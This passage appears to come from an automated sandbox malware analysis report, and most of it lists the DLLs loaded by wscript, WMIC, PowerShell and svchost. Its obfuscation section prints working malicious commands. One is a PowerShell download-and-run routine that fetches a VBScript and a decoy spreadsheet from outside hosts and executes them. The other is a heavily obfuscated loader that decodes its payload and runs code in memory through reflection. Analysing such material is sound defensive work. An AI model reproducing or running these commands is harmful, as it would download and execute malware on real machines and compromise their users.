            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2802521885.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006D53000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
            Source: Yara matchFile source: 0000000A.00000002.2781375941.0000000005309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Augustsndag)$GlobaL:ElekTRoteKNIkkEr = [SyStem.Text.ENCodIng]::ASCII.getsTRInG($RIpieNIST)$gloBaL:buzZaRd=$EleKTROTEKNIKKEr.suBsTrING($BaLLeTKORpSEts,$AfLeDtes)<#Sonantic Albertustal
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Restgrupper $Stitres $Hypophyse), (Minesprngningerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Indfrselstilladelsens = [AppDomain]::CurrentDomain.Get
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tllevrker)), $Kloring).DefineDynamicModule($Romanernes160, $false).DefineType($Kandissens, $Citational, [System.MulticastDelegate])$Ma
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Augustsndag)$GlobaL:ElekTRoteKNIkkEr = [SyStem.Text.ENCodIng]::ASCII.getsTRInG($RIpieNIST)$gloBaL:buzZaRd=$EleKTROTEKNIKKEr.suBsTrING($BaLLeTKORpSEts,$AfLeDtes)<#Sonantic Albertustal
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Ree
